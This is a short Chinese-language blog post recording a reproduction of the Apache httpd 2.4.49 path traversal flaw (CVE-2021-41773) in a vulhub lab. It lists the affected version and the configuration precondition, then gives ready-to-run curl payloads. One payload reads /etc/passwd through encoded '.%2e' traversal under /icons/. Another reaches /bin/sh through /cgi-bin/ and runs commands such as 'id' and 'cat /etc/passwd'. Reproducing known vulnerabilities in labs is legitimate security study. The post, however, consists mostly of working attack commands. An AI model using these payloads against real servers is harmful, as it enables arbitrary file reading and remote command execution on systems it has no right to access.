自己的一次簡單的漏洞復現記錄
學習請移步:https://github.com/vulhub/vulhub/blob/master/httpd/CVE-2021-41773/README.zh-cn.md
- https://httpd.apache.org/security/vulnerabilities_24.html
- 影響版本:
=2.4.49 - 利用條件:穿越的目錄允許被訪問,比如配置了
<Directory />Require all granted</Directory>,(默認情況下是不允許的:<Directory />Require all denied</Directory>)
滿足以上兩個條件即可造成路徑穿越,可以進行任意檔案讀取
注意:這里的/icons/必須是一個存在且可訪問的目錄
payload
curl -v --path-as-is http://your-ip:your-port/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
在服務端開啟了cgi或cgid這兩個mod的情況下,這個路徑穿越漏洞將可以執行任意命令:
ScriptAlias與Alias指令非常相似,都是定義了映射到一個特定目錄的URL前綴,兩者一般都用于指定位于DocumentRoot以外的目錄,其不同之處是ScriptAlias又多了一層含義,即URL前綴后面的任何檔案都被視為CGI程式,所以,上述配置會指示Apache任何以/cgi-bin/開頭的資源都將映射到/usr/local/apache2/cgi-bin/目錄中,且視之為CGI程式,
payload
curl --data "echo;id" 'http://your-ip:your-port/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh
echo;cat /etc/passwd
轉載請註明出處,本文鏈接:https://www.uj5u.com/ruanti/306400.html
標籤:其他
下一篇:Nginx 服務--虛擬主機